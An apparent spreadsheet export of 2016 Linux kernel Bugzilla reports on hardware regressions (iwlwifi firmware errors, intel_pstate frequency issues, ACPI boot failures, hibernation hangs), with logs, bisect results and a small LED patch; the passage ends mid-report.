    <t>Created attachment 198131 [details] Patch on surfacepro3_button My Surface pro 4 is i7/16G not sure if this applies to all other surface pro 4 model. From Device Manager under Windows, surface pro 4 seems to use a different device id MSHW0040 for its button. I tried to make use to existing surfacepro3_button module and seems it works by simply add new ID. All three buttons (power/volumn up/down) are all working. Surface Pro 4 doesn't have a home button. Patch attached.</t>
  </si>
  <si>
    <t>Andy Lutomirski</t>
  </si>
  <si>
    <t>Build error with multiv7 defconfig on timer-atmel</t>
  </si>
  <si>
    <t>4.4-rc6-rt</t>
  </si>
  <si>
    <t>PREEMPT_RT</t>
  </si>
  <si>
    <t>2016-01-05 13:33 UTC</t>
  </si>
  <si>
    <t>Dan Murphy</t>
  </si>
  <si>
    <t>2016-03-09 13:30 UTC</t>
  </si>
  <si>
    <t>drivers/clocksource/timer-atmel-pit.c: In function 'pit_clkevt_shutdown': drivers/clocksource/timer-atmel-pit.c:99:11: error: 'atmel_pit_irq' undeclared (first use in this function) free_irq(atmel_pit_irq, data); ^ drivers/clocksource/timer-atmel-pit.c:99:11: note: each undeclared identifier is reported only once for each function it appears in drivers/clocksource/timer-atmel-pit.c: In function 'pit_clkevt_set_periodic': drivers/clocksource/timer-atmel-pit.c:111:31: error: 'at91sam926x_pit_interrupt' undeclared (first use in this function) ret = request_irq(data-&gt;irq, at91sam926x_pit_interrupt, ^ drivers/clocksource/timer-atmel-pit.c: In function 'at91sam926x_pit_common_init': drivers/clocksource/timer-atmel-pit.c:192:6: warning: unused variable 'ret' [-Wunused-variable] int ret; ^ drivers/clocksource/timer-atmel-pit.c: At top level: drivers/clocksource/timer-atmel-pit.c:156:20: warning: 'at91sam926x_pit_interrupt' defined but not used [-Wunused-function] static irqreturn_t at91sam926x_pit_interrupt(int irq, void *dev_id) Seems to be introduced by commit 7b6123fe8ec209cab62d92357731d9eaa3ad33d1 ARM: AT91: PIT: Remove irq handler when clock event is unused</t>
  </si>
  <si>
    <t>FADT address favor - Boot fails on HP 6715s</t>
  </si>
  <si>
    <t>4.4.0-rc7</t>
  </si>
  <si>
    <t>2016-01-06 20:08 UTC</t>
  </si>
  <si>
    <t>Olof Englund</t>
  </si>
  <si>
    <t>2016-11-21 12:13 UTC</t>
  </si>
  <si>
    <t>Original bug report here: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1529381 Result when trying to boot: - Message about loading initrd image or somesuch. - Screen goes black. - Fan goes to full speed. - HD light lit for about 15 seconds or so, then goes dark. Found the latest working kernel version (in Ubuntu) to be 3.19.0-25.26. Bisected to 3.19.0-26.27 and found this: "19114b5458510b757cd2801e64094e4062e4067f is the first bad commit commit 19114b5458510b757cd2801e64094e4062e4067f Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Wed Jul 1 14:43:34 2015 +0800 ACPICA: Tables: Enable default 64-bit FADT addresses favor BugLink: http://bugs.launchpad.net/bugs/1479048 commit 0ea61381788a37d864f9841b0fe97d40f7058f3b upstream. ACPICA commit 4da56eeae0749dfe8491285c1e1fad48f6efafd8 The following commit temporarily disables correct 64-bit FADT addresses favor during the period the root cause of the bug is not fixed: Commit: 85dbd5801f62b66e2aa7826aaefcaebead44c8a6 ACPICA: Tables: Restore old behavor to favor 32-bit FADT addresses. With enough protections, this patch re-enables 64-bit FADT addresses by default. If regressions are reported against such change, this patch should be bisected and reverted. Note that 64-bit FACS favor and 64-bit firmware waking vector favor are excluded by this commit in order not to break OSPMs. Lv Zheng. Link: https://bugzilla.kernel.org/show_bug.cgi?id=74021 Link: https://github.com/acpica/acpica/commit/4da56eea Reported-and-tested-by: Oswald Buddenhagen &lt;ossi@kde.org&gt; Signed-off-by: Lv Zheng &lt;lv.zheng@intel.com&gt; Signed-off-by: Bob Moore &lt;robert.moore@intel.com&gt; Signed-off-by: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; Signed-off-by: Kamal Mostafa &lt;kamal@canonical.com&gt; Signed-off-by: Luis Henriques &lt;luis.henriques@canonical.com&gt; :040000 040000 0b002dc7d6e5abe0ded978926361d88efd5a0f88 27c36ea102b1622ded7beecbca477f62fa33922a M include"</t>
  </si>
  <si>
    <t>iwlwifi: dvm: cannot turn off wifi LED</t>
  </si>
  <si>
    <t>2016-01-08 21:56 UTC</t>
  </si>
  <si>
    <t>Hubert Tarasiuk</t>
  </si>
  <si>
    <t>2016-01-25 07:43 UTC</t>
  </si>
  <si>
    <t>It is not possible to turn of the wifi indicator LED using sysfs or using module parameter. The bug for sysfs can be resolved by the following patch. Handling 'led_mode=3' needs another simple patch in led.c:iwl_leds_init. This is my first bug report for Linux kernel. Let me know if this is the wrong place or if you need any more information. From 132afdea768bea0a5dc0f46417b261138b9b0286 Mon Sep 17 00:00:00 2001 From: Hubert Tarasiuk &lt;hubert.tarasiuk@gmail.com&gt; Date: Mon, 4 Jan 2016 23:45:18 +0100 Subject: [PATCH] iwlwifi: allow led turn off in iwl dvm module --- drivers/net/wireless/iwlwifi/dvm/led.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/dvm/led.c b/drivers/net/wireless/iwlwifi/dvm/led.c index ca4d669..218617a 100644 --- a/drivers/net/wireless/iwlwifi/dvm/led.c +++ b/drivers/net/wireless/iwlwifi/dvm/led.c @@ -154,11 +154,14 @@ static void iwl_led_brightness_set(struct led_classdev *led_cdev, { struct iwl_priv *priv = container_of(led_cdev, struct iwl_priv, led); unsigned long on = 0; + unsigned long off = 0; if (brightness &gt; 0) on = IWL_LED_SOLID; + else + off = IWL_LED_SOLID; - iwl_led_cmd(priv, on, 0); + iwl_led_cmd(priv, on, off); } static int iwl_led_blink_set(struct led_classdev *led_cdev, -- 2.6.4</t>
  </si>
  <si>
    <t>iwlwifi: mvm: ASSERT 0x00003421 while closing the device</t>
  </si>
  <si>
    <t>4.3.3-2-ck/vanilla</t>
  </si>
  <si>
    <t>2016-01-12 10:51 UTC</t>
  </si>
  <si>
    <t>Petter Krossbakken</t>
  </si>
  <si>
    <t>2016-02-28 13:50 UTC</t>
  </si>
  <si>
    <t>Arch x64 4.3.3-2 iwlwifi - Intel Wireless AC 7260 Asus UX32LN iwlwifi 0000:02:00.0: Direct firmware load for iwlwifi-7260-17.ucode failed with error -2 nemo[1358]: segfault at 50 ip 0000000000494984 sp 00007ffc533d8aa8 error 6 in nemo[400000+1c2000] iwlwifi 0000:02:00.0: Microcode SW error detected. Restarting 0x2000000. iwlwifi 0000:02:00.0: FW error in SYNC CMD MAC_CONTEXT_CMD</t>
  </si>
  <si>
    <t>iwlwifi: mvm: scheduled scan doesn't report results when no matches are passed - MWG100254662</t>
  </si>
  <si>
    <t>4.1.13</t>
  </si>
  <si>
    <t>2016-01-15 06:19 UTC</t>
  </si>
  <si>
    <t>wzhen12</t>
  </si>
  <si>
    <t>2016-02-15 06:50 UTC</t>
  </si>
  <si>
    <t>Hardware: Intel edison with Intel 7260 chip. Software:Connman-1.3, Wpa_supplicant-2.5 and kernel-4.1.13 The firmware of Intel 7260 is iwlwifi-7260-13.ucode. Step: 1. After wifi is enabled, use the connman cmd of "connmanctl scan wifi" to scan wifi ap. 2. When use the connman cmd of "connmanctl scan wifi", connman will invoke the interfaces of Wpa_supplicant and Wpa_supplicant will trigger sched scan. 3. After trigger sched scan, no NL80211_CMD_SCHED_SCAN_RESULTS events come from kernel with Intel 7260 chip. 4. Wpa_supplicant will always wait for the events of NL80211_CMD_SCHED_SCAN_RESULTS to get the sched scan results. Expect: NL80211_CMD_SCHED_SCAN_RESULTS events come from kernel with Intel 7260 chip.</t>
  </si>
  <si>
    <t>Skylake / Intel i5-6200U hangs during boot on "HWP enabled" message</t>
  </si>
  <si>
    <t>4.4.0-040400-generic</t>
  </si>
  <si>
    <t>2016-01-17 17:31 UTC</t>
  </si>
  <si>
    <t>anders.ekbom</t>
  </si>
  <si>
    <t>2016-07-13 04:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 200221 [details] Boot sequence On a Thinkpad Yoga 260 with an i5-6200U CPU, Ubuntu 15.10 with kernel 4.4.0-040400-generic stops during the boot process on the message "Intel_pstate: HWP enabled" Adding "intel_pstate=no_hwp" to /etc/default/grub or as a startup parameter solves the problem, as well as "intel_pstate=disabled".</t>
  </si>
  <si>
    <t>iwlwifi: mvm: can't load firmware with HW rfkill is asserted - MWG100254508</t>
  </si>
  <si>
    <t>4.3.5-gentoo</t>
  </si>
  <si>
    <t>2016-01-27 06:21 UTC</t>
  </si>
  <si>
    <t>Wolfram Schlich</t>
  </si>
  <si>
    <t>2016-02-17 15:59 UTC</t>
  </si>
  <si>
    <t>Hi! When booting up the system with the rfkill hw switch (accidently) turned on, iwlwifi fails to load the firmware: --8&lt;-- [ 22.080505] iwlwifi 0000:03:00.0: enabling device (0000 -&gt; 0002) [ 22.092123] iwlwifi 0000:03:00.0: loaded firmware version 17.228510.0 op_mode iwlmvm [ 22.098023] iwlwifi 0000:03:00.0: Detected Intel(R) Dual Band Wireless AC 7260, REV=0x144 [ 22.098089] iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled [ 22.098314] iwlwifi 0000:03:00.0: RF_KILL bit toggled to disable radio. [ 22.098337] iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled [ 27.099345] iwlwifi 0000:03:00.0: Failed to load firmware chunk! [ 27.099348] iwlwifi 0000:03:00.0: Could not load the [0] uCode section [ 27.099357] iwlwifi 0000:03:00.0: Failed to start INIT ucode: -110 [ 27.099646] iwlwifi 0000:03:00.0: Failed to run INIT ucode: -110 [ 27.099688] iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled --8&lt;-- Unblocking the rfkill hw switch of course doesn't help. rmmod + modprobe iwlwifi (etc.) is required, then it works fine. Hardware: - Dell Precision M4800 - Intel Dual Band Wireless-AC 7260 7260HMW (8086:08b1) Software: - Kernel: Linux zephyr 4.3.4-gentoo #1 SMP Tue Jan 26 14:57:11 CET 2016 x86_64 Intel(R) Core(TM) i7-4910MQ CPU @ 2.90GHz GenuineIntel GNU/Linux Cheers, Wolfram</t>
  </si>
  <si>
    <t>4.5.0-rc3</t>
  </si>
  <si>
    <t>Intel iwlwifi is broken due to commit d29cb66463810614abf81dd80d75da59c1e4fd07</t>
  </si>
  <si>
    <t>2016-02-09 02:06 UTC</t>
  </si>
  <si>
    <t>Electric Universe</t>
  </si>
  <si>
    <t>2016-02-11 06:19 UTC</t>
  </si>
  <si>
    <t>The description is not accurate and DVM should not depend on a modular kernel. This was fixed once in the past but is back.</t>
  </si>
  <si>
    <t>Kernel fails to restore from hibernation (works with 3.19 kernel + f5b2831d654167d7 reverted )- Dell Latitude E7440 (Intel i7-4600U)</t>
  </si>
  <si>
    <t>3.19, 4.0, 4.1, 4.2, 4.3, 4.4, 4.5RC</t>
  </si>
  <si>
    <t>2016-02-20 23:25 UTC</t>
  </si>
  <si>
    <t>Robin Obůrka</t>
  </si>
  <si>
    <t>2016-05-18 09:04 UTC</t>
  </si>
  <si>
    <t>Created attachment 204121 [details] Console output druring failure Overview -------- Kernel fails to restore from hibernation. It just freez without stack trace or any reasonable error message. Console stops to produce more output, no disk activity detected. I'm using Dell Latitude E7440 with Intel i7-4600U processor. Steps to Reproduce ------------------ On expected architecture: 1) Boot kernel 3.19 or newer. 2) Hibernate computer. 3) Try to start it again. 4) Image is loaded but system doesn't start. 5) If it starts - try the step 2 again. Sometimes, It works first time. The second try fails every time. Actual Results -------------- System is not laoded. Expected Results ---------------- System should be restored from hibernation. Build Date &amp; Hardware --------------------- Every kernel version after 3.18.x. Dell Latitude E7440 with Intel i7-4600U processor. BIOS in Legay mode (no EFI). Additional Information ---------------------- I have found several similar bug reports but I'm not sure if it is the same issue. I have no stack trace and the versions didn't match. It is all OK with kernel 3.18.x and older versions. Kernel 3.19.0 is the first one with this bug. Thanks to no_console_suspend I have some output. (See arrachment)</t>
  </si>
  <si>
    <t>Module level code (_REG) [BUG] ODEBUG: assert_init not available (active state 0)</t>
  </si>
  <si>
    <t>v4.5-rc2</t>
  </si>
  <si>
    <t>2016-02-23 02:12 UTC</t>
  </si>
  <si>
    <t>2016-09-27 07:17 UTC</t>
  </si>
  <si>
    <t>v4.5-rc2. Macbook 2012 (IVB). ODEBUG reports an error or two at shutdown. Apart from the ODEBUG error(s), this bug also seems to cause some graphical corruption when typing in Firefox text fields. efaed9be998b5ae0afb7458e057e5f4402b43fa0 is the first bad commit commit efaed9be998b5ae0afb7458e057e5f4402b43fa0 Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Tue Dec 29 14:03:08 2015 +0800 ACPICA: Events: Enhance acpi_ev_execute_reg_method() to ensure no _REG evaluations can happen during OS early boot stages ACPICA commit 31178590dde82368fdb0f6b0e466b6c0add96c57 We can ensure no early _REG evaluations by ensuring the following rules in acpi_ev_execute_reg_method(): 1. If an address space handler is installed during early stage, _REG(CONNECT) evaluations are blocked. This is achieved using acpi_gbl_reg_methods_enabled which is renamed from acpi_gbl_reg_methods_executed. 2. If _REG(CONNECT) has never been evalauted for the region object, _REG(DISCONNECT) evaluations are blocked. This is achieved by a new region object flag: AOPOBJ_REG_CONNECTED. Note that, after applying this patch, we can ensure _REG(DISCONNECT) is always paired to _REG(CONNECT). Lv Zheng Link: https://github.com/acpica/acpica/commit/31178590 Signed-off-by: Lv Zheng &lt;lv.zheng@intel.com&gt; Signed-off-by: Bob Moore &lt;robert.moore@intel.com&gt; Signed-off-by: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; :040000 040000 357c50e20ee06ad557c77a2a03d09719dae9dc52 3e0610826dc9cb86454baf06de9392aa31e0aa91 M drivers [ 34.512758] ------------[ cut here ]------------ [ 34.512765] WARNING: CPU: 0 PID: 4975 at lib/debugobjects.c:263 debug_print_object+0x85/0xa0() [ 34.512770] ODEBUG: assert_init not available (active state 0) object type: timer_list hint: stub_timer+0x0/0x20 [ 34.512772] Modules linked in: [ 34.512774] CPU: 0 PID: 4975 Comm: systemd Not tainted 4.4.0-rc7+ #353 [ 34.512776] Hardware name: Apple Inc. MacBookPro10,2/Mac-AFD8A9D944EA4843, BIOS MBP102.88Z.0106.B0A.1509130955 09/13/2015 [ 34.512779] ffffffff81f9b41c ffff880227a1bdb0 ffffffff814ec829 ffff880227a1bdf8 [ 34.512782] ffff880227a1bde8 ffffffff810cd831 ffff880227a1be90 ffffffff822514c0 [ 34.512785] ffffffff81f9b4c2 ffffffff8327e288 00007f29190ba700 ffff880227a1be48 [ 34.512786] Call Trace: [ 34.512790] [&lt;ffffffff814ec829&gt;] dump_stack+0x4b/0x72 [ 34.512793] [&lt;ffffffff810cd831&gt;] warn_slowpath_common+0x81/0xc0 [ 34.512795] [&lt;ffffffff810cd8b7&gt;] warn_slowpath_fmt+0x47/0x50 [ 34.512798] [&lt;ffffffff811398c2&gt;] ? do_init_timer+0x52/0x60 [ 34.512800] [&lt;ffffffff8150a015&gt;] debug_print_object+0x85/0xa0 [ 34.512802] [&lt;ffffffff81139830&gt;] ? trace_event_raw_event_tick_stop+0x100/0x100 [ 34.512805] [&lt;ffffffff8150ac38&gt;] debug_object_assert_init+0xf8/0x130 [ 34.512807] [&lt;ffffffff8111a5bd&gt;] ? trace_hardirqs_on+0xd/0x10 [ 34.512810] [&lt;ffffffff8113afdf&gt;] del_timer+0x1f/0x70 [ 34.512813] [&lt;ffffffff811c2331&gt;] laptop_sync_completion+0x61/0x100 [ 34.512815] [&lt;ffffffff811c22d0&gt;] ? laptop_io_completion+0x30/0x30 [ 34.512819] [&lt;ffffffff812569cf&gt;] sys_sync+0x7f/0x90 [ 34.512824] [&lt;ffffffff81b88e17&gt;] entry_SYSCALL_64_fastpath+0x12/0x6f [ 34.512825] ---[ end trace 8fe52cbaccc47e66 ]--- [ 34.512830] ------------[ cut here ]------------ [ 34.512833] WARNING: CPU: 0 PID: 4975 at lib/debugobjects.c:263 debug_print_object+0x85/0xa0() [ 34.512835] ODEBUG: assert_init not available (active state 0) object type: timer_list hint: stub_timer+0x0/0x20 [ 34.512836] Modules linked in: [ 34.512838] CPU: 0 PID: 4975 Comm: systemd Tainted: G W 4.4.0-rc7+ #353 [ 34.512839] Hardware name: Apple Inc. MacBookPro10,2/Mac-AFD8A9D944EA4843, BIOS MBP102.88Z.0106.B0A.1509130955 09/13/2015 [ 34.512842] ffffffff81f9b41c ffff880227a1bdb0 ffffffff814ec829 ffff880227a1bdf8 [ 34.512845] ffff880227a1bde8 ffffffff810cd831 ffff880227a1be90 ffffffff822514c0 [ 34.512847] ffffffff81f9b4c2 ffffffff8331f388 00007f29190ba700 ffff880227a1be48 [ 34.512848] Call Trace: [ 34.512850] [&lt;ffffffff814ec829&gt;] dump_stack+0x4b/0x72 [ 34.512853] [&lt;ffffffff810cd831&gt;] warn_slowpath_common+0x81/0xc0 [ 34.512855] [&lt;ffffffff810cd8b7&gt;] warn_slowpath_fmt+0x47/0x50 [ 34.512857] [&lt;ffffffff811398c2&gt;] ? do_init_timer+0x52/0x60 [ 34.512859] [&lt;ffffffff8150a015&gt;] debug_print_object+0x85/0xa0 [ 34.512861] [&lt;ffffffff81139830&gt;] ? trace_event_raw_event_tick_stop+0x100/0x100 [ 34.512864] [&lt;ffffffff8150ac38&gt;] debug_object_assert_init+0xf8/0x130 [ 34.512865] [&lt;ffffffff8111a5bd&gt;] ? trace_hardirqs_on+0xd/0x10 [ 34.512868] [&lt;ffffffff8113afdf&gt;] del_timer+0x1f/0x70 [ 34.512869] [&lt;ffffffff811c2331&gt;] laptop_sync_completion+0x61/0x100 [ 34.512871] [&lt;ffffffff811c22d0&gt;] ? laptop_io_completion+0x30/0x30 [ 34.512873] [&lt;ffffffff812569cf&gt;] sys_sync+0x7f/0x90 [ 34.512876] [&lt;ffffffff81b88e17&gt;] entry_SYSCALL_64_fastpath+0x12/0x6f [ 34.512877] ---[ end trace 8fe52cbaccc47e67 ]---</t>
  </si>
  <si>
    <t>Regression: bogus passive trip point causes processors throttled unexpectedly - Lenovo G510, Y50-70 laptop</t>
  </si>
  <si>
    <t>4.4.5-1</t>
  </si>
  <si>
    <t>2016-03-14 00:50 UTC</t>
  </si>
  <si>
    <t>greeenify</t>
  </si>
  <si>
    <t>2016-05-21 19:13 UTC</t>
  </si>
  <si>
    <t>It seems like there is a regression of the pstate behavior after suspend in the 4.4 line. After I resume from suspend the max. scaling frequency is locked to 2.0Ghz and after the second resume it is locked to 1.36Ghz and doesn't change on further suspends. It is possible to modify/update the max. scaling frequency more downwards, but not upwards. Writes to the kernel sys-fs fail as well as other tools like "cpupower". Moreover the turbo option is also irreversible disabled after resume. The min. scaling frequency seems to be not affected. I discovered this behavior with 4.4.5-1 running ArchLinux x86_64. CPU: Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz The only thing that helped was to downgrade to 4.3.3-3. The behavior is nearly identical to the ones reported: https://bugzilla.kernel.org/show_bug.cgi?id=90421 https://bugzilla.kernel.org/show_bug.cgi?id=61241 Is there any way I could help to trace or debug this behavior?</t>
  </si>
  <si>
    <t>Boot EC requirement - Hotkeys not functional on Asus X550ZE</t>
  </si>
  <si>
    <t>4.6.4-301.fc24.x86_64</t>
  </si>
  <si>
    <t>2016-03-20 19:14 UTC</t>
  </si>
  <si>
    <t>Luya Tshimbalanga</t>
  </si>
  <si>
    <t>2016-11-08 02:23 UTC</t>
  </si>
  <si>
    <t>Following the suggestion on reporting the bug here, here is the issue related to hotkeys: https://bugzilla.redhat.com/show_bug.cgi?id=1206862 The problem is outstanding since I brought ASUS X550ZE as none of the hotkeys works on every kernel release.Here is the needed info: $ modinfo asus-nb-wmi filename: /lib/modules/4.4.5-300.fc23.x86_64/kernel/drivers/platform/x86/asus-nb-wmi.ko.xz alias: wmi:0B3CBB35-E3C2-45ED-91C2-4C5A6D195D1C license: GPL description: Asus Notebooks WMI Hotkey Driver author: Corentin Chary &lt;corentin.chary@gmail.com&gt; depends: asus-wmi intree: Y vermagic: 4.4.5-300.fc23.x86_64 SMP mod_unload parm: wapf:WAPF value (uint) I: Bus=0019 Vendor=0000 Product=0000 Version=0000 N: Name="Asus WMI hotkeys" P: Phys=asus-nb-wmi/input0 S: Sysfs=/devices/platform/asus-nb-wmi/input/input16 U: Uniq= H: Handlers=kbd event9 rfkill B: PROP=0 B: EV=100013 B: KEY=80000 0 800000000000 0 0 a1606f00900000 8200027800501000 e000000000000 0 B: MSC=10</t>
  </si>
  <si>
    <t>hibernate failure unless unload EHCI or disconnect USB hub - Thinkpad W500</t>
  </si>
  <si>
    <t>Linux 4.3 for 64-bit PCs</t>
  </si>
  <si>
    <t>2016-03-24 00:33 UTC</t>
  </si>
  <si>
    <t>andyjackson</t>
  </si>
  <si>
    <t>2016-08-15 05:36 UTC</t>
  </si>
  <si>
    <t>My notebook is thinkpad w500, debian jessie. If i plug in usb mouse/keybord/udisk etc. to notebook's usb port, hibernate/resume is fine, poweroff as it should be. But if i plugin a 4 ports usbhub to notebook which plugin usb device, poweroff after hibernate just success once, next hibernate system do not poweroff and auto resume. If i replug in all of device from the usbhub, system poweroff after hiberate, still just success once, next time hibernate will auto resume without poweroff. I temporary resolve this problem by add custom script called by systemd, the custom script unload moudle ehci_pci/ehci_hcd before kernel do s2disk and load module ehci_pci after kernel resume image. Now system power off/on as it should be. I think it's a bug, kernel should auto take care it, does it?</t>
  </si>
  <si>
    <t>BISECTED: stuck at max freq after 5 minutes if CONFIG_TICK_CPU_ACCOUNTING=n due to jiffies overflow</t>
  </si>
  <si>
    <t>2016-03-26 09:05 UTC</t>
  </si>
  <si>
    <t>Timo Valtoaho</t>
  </si>
  <si>
    <t>2016-05-02 21:33 UTC</t>
  </si>
  <si>
    <t>Created attachment 210711 [details] config of bisected kernel Switching to 4.5 kernel, cpufreq ondemand governor started to act oddly. Without any load, with freshly booted system, it pumped cpu frequency up to maximum at some point of time and stayed there. uptime can be anything, but usually less than 15 minutes when this happens. Driver is acpi-cpufreq. I have git-bisected this to 0df35026c6a527e65b53bc895ad672d648a248f3. There is a mention about certain kernel config values that are ok. My values differ and I get this kind of behaviour. CPU is AMD Phenom(tm) II X4 905e Processor.</t>
  </si>
  <si>
    <t>[intel-pstate driver regression] processor frequency very high even if in idle</t>
  </si>
  <si>
    <t>4.6-rc1</t>
  </si>
  <si>
    <t>2016-04-01 20:03 UTC</t>
  </si>
  <si>
    <t>2016-04-21 22:49 UTC</t>
  </si>
  <si>
    <t>Jörg Otte reports: in v4.5 and earlier intel-pstate downscaled idle processors (load 0.1-0.2%) to minumum frequency, in my case 800MHz. Now in v4.6-rc1 the characteristic has dramatically changed. If in idle the processor frequency is more or less a few MHz around 2500Mhz. This is the maximum non turbo frequency. No difference between powersafe or performance governor. I currently use acpi_cpufreq which works as usual. Processor: Intel(R) Core(TM) i5-4200M CPU @ 2.50GHz (family: 0x6, model: 0x3c, stepping: 0x3) Reference: http://marc.info/?l=linux-acpi&amp;m=145927229609595&amp;w=2</t>
  </si>
  <si>
    <t>iwlwifi: incorrect firmware file name exported for iwl-8260</t>
  </si>
  <si>
    <t>4.6-rc2</t>
  </si>
  <si>
    <t>2016-04-08 08:59 UTC</t>
  </si>
  <si>
    <t>Greg White</t>
  </si>
  <si>
    <t>2016-04-12 08:49 UTC</t>
  </si>
  <si>
    <t>In iwl-8000.c, the following firmware is exported: MODULE_FIRMWARE(IWL8000_MODULE_FIRMWARE(IWL8000_UCODE_API_OK)); Per the corresponding macro, this results in an export that looks like this: iwlwifi-8000-21.ucode In linux-firmware-git, that file is actually: iwlwifi-8000C-21.ucode Note the C. This is breaking (at least) the Arch mkinitcpio process.</t>
  </si>
  <si>
    <t>Thinkpad Yoga 260 fan seems to be consistently understeered at high load/temperature, laptop gets very hot</t>
  </si>
  <si>
    <t>4.4.6-300.fc23.x86_64</t>
  </si>
  <si>
    <t>2016-04-09 03:16 UTC</t>
  </si>
  <si>
    <t>Jonas Thiem</t>
  </si>
  <si>
    <t>2016-05-11 01:27 UTC</t>
  </si>
  <si>
    <t>I'm not entirely sure this is a software problem, however here it goes: The following happens: 1. When it gets hot, the fan spins up as expected 2. However, when the laptop runs really hot it doesn't seem to spin up as much as it should It seems to me that with the Thinkpad Yoga 260 the fan seems to be consistently understeered at high load/temperature, and laptop gets very hot as a result (hot enough so I can just touch it for less than a second from the bottom without burning myself) while I think the fan isn't at max speed. I guess it could also be bad cooling design of the hardware, but since I'm fairly confident the fan doesn't use the highest speed yet this seems to be something worth improving in the software. I would try to set it manually to the highest fan speed to be sure if I'm already reaching it, however due to some problem with thinkpad_acpi's fan_control=1 option on this machine (see https://bugzilla.kernel.org/show_bug.cgi?id=115981 ) I'm not sure how to do that</t>
  </si>
  <si>
    <t>Freezes after suspend or hibernate - Dell Inspiron</t>
  </si>
  <si>
    <t>4.5, 4.5.1</t>
  </si>
  <si>
    <t>2016-04-09 13:44 UTC</t>
  </si>
  <si>
    <t>José Rodrigues</t>
  </si>
  <si>
    <t>2016-04-23 13:28 UTC</t>
  </si>
  <si>
    <t>When trying to suspend to RAM with eiter pm-suspend or systemctl suspend, the screen goes blank, but the system doesn't seem to stop. It won't resume on pressing the power button. With kernel 4.4.5 and earlier on the same hardware, both suspend to ram and hibernate work as expected. Hardware is a Dell Inspiron notebook, Intel x86-64 processor, hybrid video card setup (Intel HD4000 and Radeon HD 7730M, this one is disabled), ath9k (model Atheros AR9485) wireless card. It runs on EFI mode, with a GPT SATA disk. RAM size is 8 GB, as is the swap partition.</t>
  </si>
  <si>
    <t>iwlwifi: 8260: ASSERT 0x394 - MWG100258454</t>
  </si>
  <si>
    <t>4.6-rc3</t>
  </si>
  <si>
    <t>2016-04-14 23:42 UTC</t>
  </si>
  <si>
    <t>2016-06-09 07:13 UTC</t>
  </si>
  <si>
    <t>Created attachment 212751 [details] dmesg I see these fairly often during a reassociation. [ 1322.738414] iwlwifi 0000:02:00.0: Microcode SW error detected. Restarting 0x82000000. [ 1322.738424] iwlwifi 0000:02:00.0: CSR values: [ 1322.738428] iwlwifi 0000:02:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) [ 1322.738445] iwlwifi 0000:02:00.0: CSR_HW_IF_CONFIG_REG: 0X00489008 [ 1322.738460] iwlwifi 0000:02:00.0: CSR_INT_COALESCING: 0X00000040 [ 1322.738475] iwlwifi 0000:02:00.0: CSR_INT: 0X80000000 [ 1322.738490] iwlwifi 0000:02:00.0: CSR_INT_MASK: 0X00000000 [ 1322.738504] iwlwifi 0000:02:00.0: CSR_FH_INT_STATUS: 0X00010000 [ 1322.738519] iwlwifi 0000:02:00.0: CSR_GPIO_IN: 0X00000019 [ 1322.738533] iwlwifi 0000:02:00.0: CSR_RESET: 0X00000000 [ 1322.738548] iwlwifi 0000:02:00.0: CSR_GP_CNTRL: 0X08040005 [ 1322.738563] iwlwifi 0000:02:00.0: CSR_HW_REV: 0X00000201 [ 1322.738577] iwlwifi 0000:02:00.0: CSR_EEPROM_REG: 0Xd55555d5 [ 1322.738592] iwlwifi 0000:02:00.0: CSR_EEPROM_GP: 0Xd55555d5 [ 1322.738606] iwlwifi 0000:02:00.0: CSR_OTP_GP_REG: 0Xd55555d5 [ 1322.738621] iwlwifi 0000:02:00.0: CSR_GIO_REG: 0X001f0042 [ 1322.738636] iwlwifi 0000:02:00.0: CSR_GP_UCODE_REG: 0X00000000 [ 1322.738650] iwlwifi 0000:02:00.0: CSR_GP_DRIVER_REG: 0X00000000 [ 1322.738665] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP1: 0X00000000 [ 1322.738679] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP2: 0X00000000 [ 1322.738694] iwlwifi 0000:02:00.0: CSR_LED_REG: 0X00000060 [ 1322.738709] iwlwifi 0000:02:00.0: CSR_DRAM_INT_TBL_REG: 0X888939ce [ 1322.738724] iwlwifi 0000:02:00.0: CSR_GIO_CHICKEN_BITS: 0X07800200 [ 1322.738738] iwlwifi 0000:02:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 [ 1322.738753] iwlwifi 0000:02:00.0: CSR_MONITOR_STATUS_REG: 0Xc03803c0 [ 1322.738767] iwlwifi 0000:02:00.0: CSR_HW_REV_WA_REG: 0X0001001a [ 1322.738782] iwlwifi 0000:02:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0010 [ 1322.738786] iwlwifi 0000:02:00.0: FH register values:</t>
  </si>
  <si>
    <t>System hangs after multiple suspend/resume cycles with CPU soft lockup - Clevo W840SU Core i7-4500U Haswell</t>
  </si>
  <si>
    <t>4.5.1</t>
  </si>
  <si>
    <t>2016-04-20 19:53 UTC</t>
  </si>
  <si>
    <t>Robert</t>
  </si>
  <si>
    <t>2016-07-18 02:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 213411 [details] dmesg with 1 working resume and 1 failed I am running Archlinux on a Clevo W840SU Core i7-4500U Haswell machine. The current setup is kernel 4.5.1-1-ARCH #1 SMP PREEMPT x86_64 and the system is running systemd. The newest Intel ucode update is applied on boot. There is no BIOS update available. After running multiple suspend/resume cycles the system ends up with a black screen. No ping, no console switching, no capslock. The cycle count differs from 3 with a full running system (Xorg, KDE, firefox) to &gt;10 when started with nomodeset and hibernated from command line. Basically, the symptoms are the same as in Bug #104771 and the problem persists since version 4.x of the kernel. Different hibernation systems (echo disk &gt; /sys/power/state, systemctl hibernate, uswsusp, tuxonice) lead to the same result. The steps from basic-pm-debugging.txt were performed, platform and shutdown do not change anything, all pm_test cases work for 15 times in a row. Running a minimal configuration is not yet possible on this machine, as the root partition is encrypted. pm_trace does not point to any module, but shows the following after a failed resume: [ 0.658342] Magic number: 1:163:177 [ 0.659322] acpi device:0d: hash matches After some suspend/resume cycles, in few rare cases, dmesg shows 